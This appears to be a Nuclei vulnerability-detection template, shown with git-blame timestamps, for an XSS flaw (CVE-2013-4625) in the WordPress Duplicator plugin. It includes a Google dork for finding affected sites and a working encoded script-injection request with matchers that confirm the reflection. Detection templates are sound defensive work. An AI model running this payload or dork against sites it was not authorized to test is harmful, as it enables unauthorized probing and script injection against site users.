2021-07-13 13:48:19 +00:00
id : CVE-2013-4625
info :
2022-09-09 17:34:37 +00:00
name : WordPress Plugin Duplicator < 0.4.5 - Cross-Site Scripting
2021-07-13 13:48:19 +00:00
author : daffainfo
severity : medium
2022-02-25 14:32:23 +00:00
description : A cross-site scripting vulnerability in files/installer.cleanup.php in the Duplicator plugin before 0.4.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the package parameter.
2023-09-06 13:22:34 +00:00
remediation : Upgrade to Duplicator 0.4.5 or later.
2022-02-25 14:32:23 +00:00
reference :
- https://nvd.nist.gov/vuln/detail/CVE-2013-4625
- https://packetstormsecurity.com/files/122535/WordPress-Duplicator-0.4.4-Cross-Site-Scripting.html
2022-06-07 20:50:59 +00:00
- https://seclists.org/bugtraq/2013/Jul/160
2022-07-01 10:17:46 +00:00
- https://www.htbridge.com/advisory/HTB23162
2023-07-15 16:29:17 +00:00
- http://packetstormsecurity.com/files/122535/WordPress-Duplicator-0.4.4-Cross-Site-Scripting.html
2022-02-25 14:32:23 +00:00
classification :
2022-09-06 01:33:31 +00:00
cvss-metrics : CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
2023-04-18 02:40:53 +00:00
cvss-score : 4.3
2022-02-25 14:32:23 +00:00
cve-id : CVE-2013-4625
2022-09-06 01:33:31 +00:00
cwe-id : CWE-79
2023-08-31 11:46:18 +00:00
epss-score : 0.01217
epss-percentile : 0.83576
2023-09-06 13:22:34 +00:00
cpe : cpe:2.3:a:cory_lamle:duplicator:*:*:*:*:*:*:*:*
2022-07-11 17:27:12 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : cory_lamle
product : duplicator
2023-09-06 13:22:34 +00:00
google-query : inurl:"/wp-content/plugins/duplicator"
2022-08-27 04:41:18 +00:00
tags : seclists,cve,cve2013,wordpress,xss,wp-plugin,packetstorm
2021-07-13 13:48:19 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-07-13 13:48:19 +00:00
- method : GET
path :
2021-07-19 05:36:19 +00:00
- '{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
2021-07-13 13:48:19 +00:00
matchers-condition : and
matchers :
- type : word
2023-07-11 19:49:27 +00:00
part : body
2021-07-13 13:48:19 +00:00
words :
2021-07-19 05:36:19 +00:00
- "</script><script>alert(document.domain)</script>"
2021-07-13 13:48:19 +00:00
- type : word
part : header
words :
- text/html
- type : status
status :
- 200